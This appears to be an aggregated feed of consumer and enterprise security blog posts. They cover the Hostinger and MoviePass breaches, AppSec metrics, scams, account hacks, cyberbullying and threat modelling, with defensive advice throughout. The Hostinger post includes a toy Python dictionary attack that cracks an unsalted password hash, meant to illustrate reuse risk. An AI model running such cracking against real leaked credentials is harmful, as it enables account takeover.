Whether you’re a small business owner or a blogger, having an accessible website is a must. That’s why many users look to web hosting companies so they can store the files necessary for their websites to function properly. One such company is Hostinger. This popular web, cloud, and virtual private server hosting provider and domain registrar boasts over 29 million users. But according to TechCrunch, the company recently disclosed that it detected unauthorized access to a database containing information on 14 million customers.

Let’s dive into the details of this breach. Hostinger received an alert on Friday that a server had been accessed by an unauthorized third party. The server contained an authorization token allowing the alleged hacker to obtain further access and escalate privileges to the company’s systems, including an API (application programming interface) database. An API database defines the rules for interacting with a particular web server for a specific use. In this case, the API server that was breached was used to query the details about clients and their accounts. The database included non-financial information including customer usernames, email addresses, hashed passwords, first names, and IP addresses.

Since the breach, Hostinger stated that it has identified the origin of the unauthorized access and the vulnerable system has since been secured. As a precaution, the company reset all user passwords and is in contact with respective authorities to further investigate the situation.

Although no financial data was exposed in this breach, it’s possible that cybercriminals can use the data from the exposed server to carry out several other malicious schemes. To protect your data from these cyberattacks, check out the following tips:

  • Be vigilant about checking your accounts. If you suspect that your data has been compromised, frequently check your accounts for unusual activity. This will help you stop fraudulent activity in its tracks.
  • Reset your password. Even if your password wasn’t automatically reset by Hostinger, update your credentials as a precautionary measure.
  • Practice good password hygiene. A cybercriminal can crack hashed passwords, such as the ones exposed in this breach, and use the information to access other accounts using the same password. To avoid this, make sure to create a strong, unique password for each of your online accounts.
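
To see why a cracked hash endangers other accounts, here is a minimal sketch of a dictionary attack against an unsalted SHA-256 hash. The leaked hash and wordlist are hypothetical; real attackers run wordlists with millions of entries against fast, unsalted hashes:

```python
import hashlib

# Hypothetical leaked record: an unsalted SHA-256 hash of a user's password.
leaked_hash = hashlib.sha256(b"sunshine123").hexdigest()

# A tiny stand-in for the multi-million-entry wordlists attackers really use.
wordlist = ["password", "qwerty", "sunshine123", "letmein"]

def crack(target_hash, candidates):
    """Return the first candidate whose hash matches the target, else None."""
    for candidate in candidates:
        if hashlib.sha256(candidate.encode()).hexdigest() == target_hash:
            return candidate
    return None

print(crack(leaked_hash, wordlist))  # prints "sunshine123"
```

A common password falls instantly, and once recovered it unlocks every account where it was reused. This is why reputable services store passwords with slow, salted algorithms such as bcrypt or Argon2, and why each account needs its own password.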

And, as always, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 14 Million Customers Affected By Hostinger Breach: How to Secure Your Data appeared first on McAfee Blogs.

Should You Be Measuring Flaw Rate?

Metrics — or perhaps more accurately, the right metrics — are crucial for understanding what’s really happening in your AppSec program. They serve a dual purpose: They demonstrate your organization’s current state, and also show what progress it’s making in achieving its objectives. 

We typically recommend our customers measure their compliance against their own internal AppSec policy, plus scan activity, flaw prevalence, and time to resolve. 

Flaw rate is another metric you might want to consider tracking. It is a secondary metric, unlike the primary ones listed above, but because it allows you to do a before-and-after flaw comparison for an application, it provides insight into how your rate of security findings is improving over time. Veracode analytics allows you to create the flaw rate metric by defining a formula and adding it to your chart, so you can visualize the rate alongside any other data you are reporting, such as flaw rate per application, first scan vs. most recent scan, or flaw rate per application per severity of the finding.

Keep in mind that this metric, as with flaws per MB, can vary significantly based on the size of the codebase. A monolithic, legacy application is going to have a much different flaw rate (and flaw density as measured by flaws per MB) than a small, new microservice. The value lies in comparing an application’s initial flaw rate to its current flaw rate, or comparing the flaw rate for a team across several applications (again, initial vs. current). This allows users to get a handle on what is working – or not – for that team, helping them close out security findings and reduce the number they introduce in the first place. In this way, you could validate the impact of your AppSec eLearning or other trainings. I would caution against comparing flaw rate (again, much like flaws per MB) between teams or between business units, as this won’t directly provide much actionable insight beyond which one is doing better.
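
Veracode’s exact formula isn’t reproduced here, but as an illustration only, the before-and-after comparison could be sketched as follows (all numbers and labels hypothetical), using findings per thousand lines of code as the rate:

```python
# Hypothetical scan history for one application: (label, flaws_found, size_kloc).
scans = [
    ("first scan",  120, 300),
    ("mid-year",     80, 310),
    ("most recent",  35, 320),
]

def flaw_rate(flaws, size_kloc):
    """Illustrative flaw rate: security findings per thousand lines of code."""
    return flaws / size_kloc

first = flaw_rate(scans[0][1], scans[0][2])     # 0.40 flaws/KLOC
latest = flaw_rate(scans[-1][1], scans[-1][2])  # ~0.11 flaws/KLOC

improvement = (first - latest) / first * 100
print(f"Flaw rate improved by {improvement:.0f}%")  # prints "Flaw rate improved by 73%"
```

Normalizing by codebase size is what makes the first-scan vs. most-recent comparison meaningful even as the application grows.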

Note that this metric will not produce an accurate gauge of your program’s success. Since it is applicable only to static analysis, it doesn’t take all testing techniques into account. Policy compliance is ultimately the best metric for measuring and reporting on the overall progress of your program.

But you could use flaw rate as an additional data point, alongside the following metrics, when reporting on the effectiveness or progress of your AppSec program:

Policy compliance: Your application security policy should stem from an analysis of your entire application inventory. From there, you assign groups of applications different risk categories or ratings by asking questions such as:

  • Do these applications touch PII?
  • Are they Internet-facing?
  • What would be the impact of a compromise to this system (i.e., are they business critical)?

Based on those answers, you can determine which scan frequency and testing types are required, as well as which types or severities of flaws to disallow: an Internet-facing application that contains PII will have a different risk categorization from an internal chat service and thus should be held to a different standard for security.

Additionally, this risk rating will determine frequency of scanning requirements. Low-risk functionality that is rarely updated does not need to be scanned every week, but that Internet-facing/PII app may require a scan for every commit.

Average time to resolve: Many application testing solutions focus on scan activity rather than addressing results. While apps need to be scanned, fixing those security findings in a timely manner is a better mechanism for evaluating your application security program. Time to resolve provides visibility into how many days it takes for a finding to be closed after it is first discovered, helping security teams better understand where there may be bottlenecks in the development and security process.
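
As a rough sketch with hypothetical data, time to resolve is simply the elapsed days between discovery and closure, averaged over resolved findings:

```python
from datetime import date

# Hypothetical findings: (first_discovered, closed); open findings have closed=None.
findings = [
    (date(2019, 6, 1), date(2019, 6, 15)),
    (date(2019, 6, 3), date(2019, 7, 1)),
    (date(2019, 7, 10), None),  # still open, excluded from the average
]

resolved_days = [(closed - opened).days for opened, closed in findings if closed]
avg_time_to_resolve = sum(resolved_days) / len(resolved_days)
print(avg_time_to_resolve)  # prints 21.0 (days)
```

Tracking this average over time, or per team, is what surfaces the bottlenecks between discovery and fix.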

Flaw prevalence: This metric spotlights how common a risk is within a particular industry or business. It helps an organization prioritize threats such as SQL injection, Cross-Site Scripting (XSS), cryptographic issues, and CRLF injection based on real-world impact.

Learn more about flaw rate

For detailed instructions on measuring flaw rate, please see this article in the Veracode Community.

Trust but Verify

Trust but verify — what are we talking about here?  Asking which of two pups tore apart the couch pillows?  My teenager’s story of why they missed their curfew?  An individual’s identity for a Data Subject Access Request (or individual rights request based on your privacy geography)?  Or, maybe it’s a vendor’s claim of protecting […]

The post Trust but Verify appeared first on Privacy Ref.

The real impact: how cybercrime affects more of your business than you think

Some businesses – usually those that have never experienced any kind of major IT incident – think of cybercrime as an inconvenience. They may believe that if their company is hacked it will cause some disruption and perhaps an embarrassing news story, but that ultimately the breach will have only a minor effect.

However, the truth is that cybercrime can have a huge range of unexpected consequences. Here we take a look at the real impact of a breach: cybercrime might affect you a lot more than you think.

It loses customer confidence

When you suffer a cyberattack it becomes common knowledge very quickly. Whether your site is taken offline or Google places a ‘hacked site’ warning against you, customers will learn fast that you have been compromised. And when a potential customer hears that you have been breached, they will immediately associate you with the attack, deeming your site to be unsafe to use.

Under the General Data Protection Regulation (GDPR), you are legally required to report a breach to the relevant supervisory authority within 72 hours of becoming aware of it, and to inform affected individuals without undue delay when the breach poses a high risk to them. This further erodes the confidence of customers who have already used your services or bought from your site.

It costs you sales

No business wants to lose the confidence of its customers, most importantly because it will naturally have an effect on your sales. If – in the eyes of your customers – your site can’t be trusted, they will stop using it and move on to a competitor. This means that before you take anything else into account, you will be losing business simply because you have been a victim of cybercrime.

Of course, if the cybercrime takes your website offline, you will also lose any potential transactions over that period – but the more crucial factor is the long-term effect of customers believing that you are no longer safe to buy from.

It costs a lot of money

Cyber attacks can be extremely costly for a variety of reasons. We have already talked about the kind of disruption to trading that will occur when any kind of cybercrime takes place, but it is actually a lot more complicated than that. Firstly, many forms of cybercrime will directly steal money from a business. This could come in the form of a phishing attack on a member of staff, or even a business email compromise attack.

However, there are also other costs to consider such as the financial ramifications of dealing with the hack and securing your business. And of course, any trust that is lost in your partners or suppliers can lead to you losing them.

It weakens your SEO efforts

You might not realise it, but cybercrime can have a serious impact on your search engine optimisation (SEO). There are many reasons for this – firstly, if Google believes your site is hacked, it can place a ‘hacked site’ warning in the listings. Additionally, many hacks will actually alter or steal content from your site, and website content is one of the most important ranking factors in the eyes of all search engines.

Another important factor is downtime. If Google sees that your website is down for a significant period of time, this is a negative ranking factor, and it can see your site sliding down the results. Many attacks force downtime, as you will often need to take your site offline in order to fix the issues and return it to normal.

It causes problems with compliance

We have already mentioned the GDPR in this article, and how it can force you to disclose cyber breaches to affected individuals. However, it is important to remember that compliance with the GDPR and other regulations can become an issue if you suffer a cyberattack.

Under the GDPR, businesses are required to take appropriate steps to protect themselves against attacks, in order to secure the private information that they hold on customers. Failing to do so can put you at risk of heavy fines from the ICO.

It loses your intellectual property

Another extremely common occurrence during a cyberattack is that intellectual property will be stolen. Given the incredible value of IP to some businesses, such as in technology or pharmaceutical firms, it can be easy to see how stolen IP could make a business unsustainable.

If your organisation relies upon the secrecy of its IP, then you need to make sure you are taking appropriate steps to defend that IP against cybercrime.

The post The real impact: how cybercrime affects more of your business than you think appeared first on CyberDB.

How to Spring Clean Your Digital Life

With winter almost gone, now is the perfect time to start planning your annual spring clean. When we think about our yearly sort out, most of us think about decluttering our chaotic linen cupboards or the wardrobes that we can’t close. But if you want to minimise the opportunities for a hacker to get their hands on your private online information then a clean-up of your digital house (aka your online life) is absolutely essential.

Not Glamourous but Necessary

I totally accept that cleaning up your online life isn’t exciting but let me assure you it is a must if you want to avoid becoming a victim of identity theft.

Think about how much digital clutter we have accumulated over the years. Many of us have multiple social media, messaging and email accounts. And don’t forget about all the online newsletters and ‘accounts’ we have signed up for with stores and online sites. Then there are the apps and programs we no longer use.

Well, all of this can be a liability. Holding onto accounts and files you don’t need exposes you to all sorts of risks. Your devices could be stolen or hacked, or a data breach could mean that your private details are exposed, quite possibly on the Dark Web. In short, the less information there is about you online, the better off you are.

Digital clutter can be distracting, exhausting to manage and most importantly, detrimental to your online safety. A thorough digital spring clean will help to protect your important, online personal information from cybercriminals.

What is Identity Theft?

Identity theft is a serious crime that can have devastating consequences for its victims. It occurs when a person’s personal information is stolen to be used primarily for financial gain. A detailed set of personal details is often all a hacker needs to access bank accounts, apply for loans or credit cards and basically destroy your credit rating and reputation.

How To Do a Digital Spring Clean

The good news is that digital spring cleaning doesn’t require nearly as much elbow grease as scrubbing down the microwave! Here are my top tips to add to your spring-cleaning list this year:

  1. Weed Out Your Old Devices

Gather together every laptop, desktop computer, tablet and smartphone that lives in your house. Now, you need to be strong – work out which devices are past their use-by date and which need to be spring cleaned.

If it is finally time to part ways with your first iPad or the old family desktop, make sure any important documents or holiday photos are backed up in a few places (on another computer, an external hard drive AND in a cloud storage program such as Dropbox or iCloud) so you can erase all remaining data and recycle the device with peace of mind. Be careful not to confuse ‘deleting’ with ‘erasing’, which means permanently clearing data from a device. Deleted files can often linger in a device’s recycling folder.

  2. Ensure Your Machines Are Clean!

It is not uncommon for viruses or malware to find their way onto your devices through outdated software so ensure all your internet-connected devices have the latest software updates including operating systems and browsers. Ideally, you should ensure that you are running the latest version of apps too. Most software packages do auto-update but please take the time to ensure this is happening on all your devices.

  3. Review and Consolidate Files, Applications and Services

Our devices play such a huge part in our day to day lives so it is inevitable that they become very cluttered. Your kids’ old school assignments, outdated apps and programs, online subscriptions and unused accounts are likely lingering on your devices.

The big problem with old accounts is that they get hacked! And they can often lead hackers to your current accounts so it’s a no-brainer to ensure the number of accounts you are using is kept to a minimum.

Once you have decided which apps and accounts you are keeping, take some time to review the latest privacy agreements and settings so you understand what data they are collecting and when they are collecting it. You might also discover that some of your apps are using far more of your data than you realised! Might be time to opt-out!

  4. Update Passwords and Enable Two-Factor Authentication

As the average consumer manages a whopping 11 online accounts – social media, shopping, banking, entertainment, the list goes on – updating our passwords is an important ‘cyber hygiene’ practice that is often neglected. Why not use your digital spring cleaning as an excuse to update and strengthen your credentials?

Creating long and unique passwords using a variety of uppercase and lowercase letters, numbers and symbols is an essential way of protecting yourself and your digital assets online. And if that all feels too complicated, why not consider a password management solution? Password managers help you create, manage and organise your passwords. Some security software solutions, such as McAfee Total Protection, include a password manager.
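
For instance, a strong random password takes only a few lines to generate; this sketch uses Python’s `secrets` module, which is designed for security-sensitive randomness:

```python
import secrets
import string

def generate_password(length=16):
    """Generate a random password from letters, digits and punctuation."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())  # a different strong password every run
```

A password manager does essentially this for you, then remembers the result so you never have to.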

Finally, wherever possible, you should enable two-factor authentication for your accounts to add an extra layer of defense against cybercriminals. With two-factor authentication, a user is verified with a one-time password or code delivered through a separate personal device, such as a smartphone.
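
A common second factor is the time-based one-time code (TOTP) shown by authenticator apps. As a rough, simplified sketch of how such codes are derived (RFC 6238 style, not production code), your phone and the server share a secret and each computes:

```python
import hashlib
import hmac
import struct
import time

def totp(secret, for_time=None, step=30, digits=6):
    """Derive a time-based one-time code (RFC 6238 style, HMAC-SHA1)."""
    counter = int((time.time() if for_time is None else for_time) // step)
    msg = struct.pack(">Q", counter)                   # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                         # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test vector: shared secret "12345678901234567890" at T=59 seconds.
print(totp(b"12345678901234567890", for_time=59, digits=8))  # prints "94287082"
```

Because the code changes every 30 seconds and never travels with your password, a stolen password alone is not enough to get in.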

Still not convinced? If you use social media, shop online, or subscribe to specialist newsletters, then your existence is scattered across the internet. By failing to clean up your ‘digital junk’ you are effectively giving a set of front door keys to hackers and risking having your identity stolen. Not a great scenario at all. So, make yourself a cuppa and get to work!

Til Next Time

Alex xx
The post How to Spring Clean Your Digital Life appeared first on McAfee Blogs.

Analyst Fatigue: The Best Never Rest

They may not be saying so, but your senior analysts are exhausted.

Each day, more and more devices connect to their enterprise networks, creating an ever-growing avenue for OS exploits and phishing attacks. Meanwhile, the number of threats—some of which are powerful enough to hobble entire cities—is rising even faster.

While most companies have a capable cadre of junior analysts, most of today’s EDR (Endpoint Detection and Response) systems leave them hamstrung. Typical EDR software is so startlingly complex that it takes years of experience to operate successfully; no matter how willing the more “green” analysts are to help, they just don’t yet have the skillset needed to triage threats effectively.

What’s worse, while these “solutions” require your top performers, they don’t always offer top performance in return. While your most experienced analysts should be addressing major threats, a lot of times they’re stuck wading through a panoply of false positives—issues that either aren’t threats, or aren’t worth investigating. And while they’re tied up with that, they must also confront the instances of false negatives: threats that slip through the cracks, potentially avoiding detection while those best suited to address them are busy attempting to work through the noise. This problem has gotten so bad that some IT departments are deploying MDR systems on top of their EDR packages—increasing the complexity of your company’s endpoint protection and further increasing employee stress levels.

Hoping both to measure the true impact of “analyst fatigue” on SOCs and to identify possible solutions, Forrester Consulting conducted a commissioned study on behalf of McAfee in March 2019, examining the effects current EDRs are having on businesses. Forrester surveyed security technology decision-makers, from the managers facing threats head-on to those in the C-suite viewing security solutions at the macro level in relation to their firm’s financial needs and risk tolerance. Respondents were from the US, UK, Germany, or France, and worked in a variety of industries at companies ranging in size from 1,000 to over 50,000 employees.

When asked about their endpoint security goals, respondents’ top three answers—to improve security detection capabilities (87%), increase efficiency in the SOC (76%) and close the skills gap in the SecOps team (72%)—all pointed to limitations in many current EDRs.  Further inquiry revealed that while 43% of security decision makers consider automated detection a critical requirement, only 30% feel their current solution(s) completely meet their needs in this area.

While the issues uncovered were myriad, the results also suggested that a single solution could ameliorate a variety of these problems.  The introduction of EDR programs incorporating Guided Investigation could increase efficiency by allowing junior analysts to assist in threat identification, thereby freeing up more seasoned analysts to address detected threats and focus on only the most complex issues, leading to an increase in detection capabilities. Meanwhile, the hands-on experience that junior analysts would get addressing real-life EDR threats would increase both their personal efficiency and their skill level, helping to eliminate the skills gaps present in some departments.

To learn more about the problems and possibilities in the current EDR landscape, you can read the full “Empower Security Analysts Through Guided EDR Investigation” study by clicking here.

The post Analyst Fatigue: The Best Never Rest appeared first on McAfee Blogs.

Weekly Update 153

Australia! Sunshine, good coffee and back in the water on the tail end of "winter". I'm pretty late doing this week's video as the time has disappeared rather quickly and I'm making the most of it before the next round of events. Be that as it may, there's a bunch of new stuff this week not least of which is the unexpected limit I hit with the Azure API Management consumption tier. I explain the problem in this video along with a bunch of other infosec related bits. I'll do another one from Aus later this week (if I can stick to schedule) and will try and find another nice little spot. Until then, enjoy:

References

  1. I hit an unexpected limit on the consumption tier of the Azure API Management (it's frustrating, but I'm working with Microsoft on a longer term fix and mitigating the issue in the interim)
  2. The responses to DigiCert's survey on reducing maximum cert lifespans make for sad reading (there are much bigger root causes within enterprises that need sorting out)
  3. Hostinger got themselves breached (I still think the wording here is poor, surely we can do better as an industry?)
  4. Big thanks to strongDM for sponsoring my blog over the last week! (see why Splunk's CISO says "strongDM enables you to see what happens, replay & analyze incidents. You can't get that anywhere else")

Beware of Back-To-School Scams

These days it seems that there is a scam for every season, and back-to-school is no different. From phony financial aid to debt scams and phishing emails designed to steal your identity information, there are a lot of threats to study up on.

Of course, many of these scams are just different twists on the threats we see year-round. For instance, debt collection, tax, and imposter scams were named among the top frauds of 2018 by the Federal Trade Commission, costing U.S. consumers over $1.48 billion. And many of the same techniques are being directed at students, graduates, and their parents.

Here’s what to watch out for:

Identity Theft— While you might think that identity theft would only be a risk to older students applying for aid, in fact over a million children were victims of identity theft in 2017, with two thirds of them under the age of eight. This is because children’s identities can be more valuable to cyber thieves as their Social Security numbers have never been used before, so they have clean credit reports that are rarely checked.

Some savvy scammers have even started to ask parents for their child’s identity information when applying for common back-to-school activities, such as joining a sports league or after school class.

Phony Tuition Fees—“Don’t lose your spot!” This is the call to action scammers are using to trick students and parents into paying a made-up tuition fee. You may receive an official looking email, or receive a call directly from scammers, hoping to take advantage of the stress that many people feel around getting into the school of their choice. Some victims of this scam have already paid tuition, but are confused by last-minute requests for a fee to save their spot.

Financial Aid Fraud—Education has become incredibly expensive in recent years, and scammers know it. That’s why they put up ads for phony financial aid, and send phishing emails, hoping to lure applicants with the promise of guaranteed assistance, or time sensitive opportunities.

Many pose as financial aid services that charge an “advance fee” to help students apply for loans. When you fill out an application the fraudsters potentially get both your money (for the “service”) and your identity information. This can lead to identity theft, costing victims an enormous amount of time and money.

Student Loan Forgiveness—We’ve seen a proliferation of social media ads and emails offering to help student borrowers reduce, or even completely forgive, their loan debt. Some of these offers are from legitimate companies that lend advice on complicated financial matters, but others are scams, charging exorbitant fees with the promise of renegotiating your debt. Just remember, debt relief companies are not permitted to negotiate federal student loans.

Phony Student Taxes—Another common scam targeting students involves phony messages and phone calls from the IRS, claiming that the victim needs to immediately pay a “federal student tax” or face arrest. Of course, this tax does not exist.

Shopping Scams—From books, clothes, and supplies, to dorm accessories, the start of the school year often means the start of an online shopping frenzy. That’s when students and parents are susceptible to phishing emails that offer “student discounts” on popular items, or claim that they “missed a delivery” and need to click on an attachment. Links in these emails often lead to phony websites that collect their payment information, or malware. The same is true for offers of cheap or “free” downloads on normally expensive textbooks.

Here are some tips to avoid these sneaky school-related scams:

  • Be suspicious of any school programs that ask for more information than they need, like your child’s Social Security number just to join a club.
  • Only shop on reputable e-commerce sites for back to school supplies. Buy textbooks from recommended providers, and avoid any “free” digital downloads. Consider installing a web advisor to steer you away from risky websites.
  • When seeking financial aid, ask a school adviser for a list of reputable sources. Avoid any offers that sound too good to be true, like “guaranteed” or zero interest loans. Remember that it does not cost money to simply apply for financial aid.
  • If you receive any threatening emails or phone calls about loans or fees, do not respond. Instead, contact your loan provider directly to check on the status of your account.
  • Avoid using unsecured public Wi-Fi on campus, since it’s easy for a hacker to intercept the information that you are sending over the network. Only connect to secure networks that require a password.
  • Install comprehensive security software on all of your computers and devices. Look for software that protects you from malware, phishing attempts, and risky websites, and that also provides identity protection.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post Beware of Back-To-School Scams appeared first on McAfee Blogs.

Ellen DeGeneres Instagram Hack: What You Can Do to Protect Your Account

Today was not an easy morning for Ellen DeGeneres. She woke to find that her Instagram account had been briefly hacked, according to her own Twitter account and Yahoo Entertainment. A series of giveaways offering free Tesla cars, MacBooks, and more was posted to the talk show host’s account last night. After seeing the posts, some of her followers became skeptical and warned her of the suspicious behavior. They were smart to flag the giveaways as untrustworthy, because DeGeneres confirmed that her Instagram had in fact been affected by malicious activity.

While Ellen joked about “password” not being the most secure password, it’s always a best practice to use strong passwords that differ from each of your other accounts to avoid easy break-ins from cybercriminals.

One of the central reasons hackers target social media accounts is to retrieve stored personal information. Once cybercriminals log into an account, they have access to everything that has ever been shared with the platform, such as date of birth, email, hometown, and answers to security questions. They then could potentially use this information to try to log into other accounts or even steal the person’s identity, depending on the level of information they have access to.

Another motive for hijacking a user’s social media account is to spread phishing scams or malware amongst the user’s network. In DeGeneres’ case, her 76 million Instagram followers were prompted to click on links that were scams disguised as giveaways so hackers could steal their personal information. In other cases, hackers will use adware so they can profit off of clicks and gain access to even more valuable information from you and your contacts. Sometimes these cybercriminals will post publicly on your behalf to reach your entire network, and other times they will read through private messages and communicate with your close network directly.

It’s not just celebrities that are vulnerable to cybercriminals. In fact, over 22% of internet users reported that their online accounts have been hacked at least once, and more than 14% said that they were hacked more than once. If your account gets hacked, the first step is to change your password right away and notify your network so they don’t click on any suspicious links.

The good news is that by taking proper precautions, you can significantly reduce risk to help keep your account safe. Here are five best practices for protecting your social media accounts from malicious activity:

  • Use your best judgment and don’t click on suspicious messages or links, even if they appear to be posted by a friend.
  • Flag any scam posts or messages you encounter on social media to the platform, so they can help stop the threat from spreading.
  • Use unique, complicated passwords for all your accounts.
  • Avoid posting any identifying information or personal details that might allow a hacker to guess your security questions.
  • Always use comprehensive security software that can keep you protected from the latest threats.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Ellen DeGeneres Instagram Hack: What You Can Do to Protect Your Account appeared first on McAfee Blogs.

Clicks & Cliques: How to Help Your Daughter Deal with Mean Girls Online

According to a new report released by the National Center for Education Statistics (NCES), mean girls are out in force online. Data shows that girls report three times as much harassment online (21%) as boys (less than 7%). While the new data does not specify the gender of the aggressors, experts say most girls are bullied by other girls.

With school back in full swing, it’s a great time to talk with your kids — especially girls — about how to deal with cyberbullies. Doing so could mean the difference between a smooth school year and a tumultuous one.

The mean girl phenomenon, brought into the spotlight by the 2004 movie of the same name, isn’t new. Only today, mean girls use social media to dish the dirt, which can be devastating to those targeted. Mean girls are known to use cruel digital tactics such as exclusion, cliques, spreading rumors online, name-calling, physical threats, sharing explicit images of others, shaming, sharing secrets, and recruiting others to join the harassment effort.

How parents can help

Show empathy. If your daughter is the target of mean girls online, she needs your ears and your empathy. The simple, powerful phrase, “I understand,” can be an instant bridge builder. Parents may have trouble comprehending the devastating effects of cyberbullying because they, unlike their child, did not grow up under the threat of being electronically attacked or humiliated. This lack of understanding, or empathy gap, can be closed by a parent making every effort to empathize with a child’s pain.

Encourage confidence and assertiveness. Mean girls target people they consider weak or vulnerable. If they know they can exploit another person publicly and get away with it, it’s game on. Even if your daughter is timid, confidence and assertiveness can be practiced and learned. Find teachable moments at home and challenge your daughter to boldly express her opinions, thoughts, and feelings. Her ability to stand up for herself will grow over time, so get started role-playing and brainstorming various ways to respond to mean girls with confidence.

Ask for help. Kids often keep bullying a secret to keep a situation from getting worse. Unfortunately, this thinking can backfire. Encourage your daughter to reach out for help if a mean girl situation escalates. She can reach out to a teacher, a parent, or a trusted adult. She can also reach out to peers. There’s power in numbers, so asking friends to come alongside during a conflict can curb a cyberbully’s efforts.

Exercise self-control. When it comes to her behavior, mean girls habitually go low, so encourage your daughter always to go high. Regardless of the cruelty dished out, it’s important to maintain a higher standard. Staying calm, using respectful, non-aggressive language, and speaking in a confident voice can discourage a mean girl’s actions faster than retribution.

Build a healthy perspective. Remind your daughter that even though bullying feels extremely personal, it’s not. A mean girl’s behavior reflects her own pain and character deficits, which have nothing to do with her target. As much as possible, help your daughter separate herself from the rumors or lies being falsely attached to her. Remind her of her strengths and the bigger picture that exists beyond the halls of middle school and high school.

Teach and prioritize self-care. In this context, self-care is about balance and intention. It includes spending more time doing what builds you up emotionally and physically — such as sleep and exercise — and less time doing things that deplete you (like mindlessly scrolling through Instagram).

Digitally walk away. When mean girls attack online, they are looking for a fight. However, if their audience disengages, a bully can quickly lose power and interest. Walk away digitally by not responding and by unfollowing, blocking, flagging, or reporting the abusive account. Parents can also help by monitoring social activity with comprehensive software. Knowing where your child spends time online and with whom is one way to spot the signs of cyberbullying.

Parenting doesn’t necessarily get easier as our kids get older, and social media only adds another layer of complexity and concern. Even so, with consistent family conversation and connection, parents can equip kids to handle any situation that comes at them online.

The post Clicks & Cliques: How to Help Your Daughter Deal with Mean Girls Online appeared first on McAfee Blogs.

Healthcare: Research Data and PII Continuously Targeted by Multiple Threat Actors

The healthcare industry faces a range of threat groups and malicious activity. Given the critical role that healthcare plays within society and its relationship with our most sensitive information, the risk to this sector is especially consequential. It may also be one of the major reasons why we find healthcare to be one of the most retargeted industries.

In our new report, Beyond Compliance: Cyber Threats and Healthcare, we share an update on the types of threats observed affecting healthcare organizations: from criminal targeting of patient data to less frequent – but still high impact – cyber espionage intrusions, as well as disruptive and destructive threats. We urge you to review the full report for these insights; in the meantime, here are two key areas to keep in mind.

  • Chinese espionage targeting of medical researchers: We’ve seen medical research – specifically cancer research – continue to be a focus of multiple Chinese espionage groups. While the extent is difficult to fully assess, years of cyber-enabled theft of research trial data may be starting to have an impact, as Chinese companies are reportedly now manufacturing cancer drugs at a lower cost than Western firms.
  • Healthcare databases for sale under $2,000: The sheer number of healthcare-associated databases for sale in the underground is staggering. Even more concerning, many of these databases can be purchased for under $2,000 (based on sales we observed over a six-month period).

To learn more about the types of financially motivated cyber threat activity impacting healthcare organizations, nation state threats the healthcare sector should be aware of, and how the threat landscape is expected to evolve in the future, check out the full report here, or give a listen to this podcast conversation between Principal Analyst Luke McNamara and Grady Summers, EVP, Products:

For a closer look at the latest breach and threat landscape trends facing the healthcare sector, register for our Sept. 17, 2019, webinar.

For more details around an actor who has targeted healthcare, read about our newly revealed APT group, APT41.

Lights, Camera, Cybersecurity: What You Need to Know About the MoviePass Breach

If you’re a frequent moviegoer, there’s a chance you may have used or are still using the movie ticket subscription service and mobile app MoviePass. The service is designed to let film fanatics attend a variety of movies for a convenient price; however, it has now made user data convenient for cybercriminals to get ahold of. According to TechCrunch, the exposed database contained 161 million records, many of them including sensitive user information.

So, what exactly do these records include? The exposed data includes 58,000 records containing personal credit card numbers and MoviePass customer card numbers. Customer cards work much like normal debit cards: they are issued by Mastercard and store a cash balance that users draw on to pay for a catalog of movies. In addition to the customer card and financial information, other exposed data includes billing addresses, names, and email addresses. TechCrunch reported that a combination of this data could very well be enough to make fraudulent purchases.

The database also contained what researchers presumed to be hundreds of incorrectly typed passwords paired with user email addresses. To test this, TechCrunch attempted to log into the service using a fake email and password combination. Not only did they immediately gain access to a MoviePass account, but they also found that the fake login credentials were then added to the database.

Since then, TechCrunch reached out to MoviePass and the company has since taken the database offline. However, with this personal and financial information publicly accessible for quite some time, users must do everything in their power to safeguard their data. Here are some tips to help keep your sensitive information secure:

  • Review your accounts. Be sure to look over your credit card and banking statements and report any suspicious activity as soon as possible.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you monitor your accounts and alert you of any suspicious activity.

And, as always, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listening to our podcast Hackable?, and ‘Liking’ us on Facebook.


Define Your Unique Security Threats with These Tools

According to the 2019 Verizon Data Breach Investigations Report (DBIR), an attack with five or fewer steps can compromise an asset within minutes of its first action. However, it takes days—an average of 279 days—to identify and contain a breach (Ponemon Institute). And the longer it takes to discover the source, the more money the incident ends up costing the organization. Luckily, you can reduce your chance of falling victim to these attacks by proactively anticipating your greatest threats and taking measures to mitigate them.

This blog post breaks down two tools to help you determine just that: your most at-risk data, how that data can be accessed, and the attacker’s motives and abilities. Once you understand these, it will be much easier to implement countermeasures to protect your organization from those attacks.

I recommend first reading through the DBIR sections pertaining to your industry in order to further your understanding of patterns seen in the principal assets being targeted and the attackers’ motives. This will assist in understanding how to use the two tools: Method-Opportunity-Motive, by Shari and Charles Pfleeger, and Attack Trees, as discussed by Bruce Schneier.

Defining Method-Opportunity-Motive:

Method

Methods are the skills, knowledge, and tools available to the attacker, similar to the Tactics, Techniques, and Procedures (TTPs) used by the military and MITRE. Jose Esteves et al. wrote, “Although it used to be common for hackers to work independently, few of today’s hackers operate alone. They are often part of an organized hacking group, where they are members providing specialized illegal services….” A hacker’s methods are improved when part of a team, which has a motive and looks for opportunities to attack principal assets.

Opportunity

Opportunities are the time and access an attacker needs to reach their objective. The 2019 DBIR authors note, “Defenders fail to stop short paths substantially more often than long paths.” It’s critical to apply the correct controls to assets and to monitor those tools in order to quickly detect threats.

Motive

The motive is the reason to attack; for instance, is the attacker trying to access financial information or intellectual property? The 2019 DBIR notes that most attacks are for financial gain or intellectual property (IP), varying by industry.

Using Attack Trees to Visually Detail Method-Opportunity-Motive:

